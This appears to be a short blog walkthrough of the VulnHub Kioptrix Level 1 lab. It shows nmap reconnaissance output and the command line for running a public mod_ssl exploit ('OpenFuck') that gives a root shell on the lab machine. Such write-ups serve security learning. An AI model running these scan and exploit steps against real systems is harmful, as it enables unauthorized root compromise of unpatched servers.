Neelesh Patel
3 min readAug 21, 2021

VulnHub:- Kioptrix: Level 1 (#1) [Without Metasploit]

As they say this is a very easy vuln machine, so let’s start!!!

When your vm is up and running, you should see something like this

This machine is not provided with any credentials, So to see its I.P, I run netdiscover -r <I.P with subnet>, for eg:- netdiscover -r 192.168.230.0/24

During recon the results are:-

# Nmap 7.91 scan initiated Sat Aug 21 00:10:27 2021 as: nmap -T4 -p- -A -oN nmap/initials 192.168.230.132
Nmap scan report for 192.168.230.132
Host is up (0.0023s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32770/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: BWMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName= —
| Not valid before: 2009–09–26T09:32:06
|_Not valid after: 2010–09–26T09:32:06
|_ssl-date: 2021–08–21T13:41:48+00:00; +9h30m00s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
32768/tcp open status 1 (RPC #100024)

Host script results:
|_clock-skew: 9h29m59s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 21 00:11:49 2021–1 IP address (1 host up) scanned in 81.54 seconds

From all the ports opened, 139 seems interesting… From nmap results I found this mod_ssl/2.8.4.

Google this version and you’ll find the exploit, Google is awesome!!, Now Clone this as per instructions

I run the OpenF28) file first and select the appropriate target for us.

As per during recon, machine is Apache/1.3.20, so following command ./OpenFuck 0x6b 192.168.230.132 443 -c 40 establishes the connection as shown

and now we got a shell!!!, whoami, id command shows we got a root!!

Congratulations, if its your first vm from vulnhub!! :-)

That’s all for now!!

Until Next Time,

Stay Humble..

— — — — — — — —

Neelesh Patel
Neelesh Patel

Written by Neelesh Patel

All I need is just my ten fingers and sometimes {coffee}, to talk to computers.

No responses yet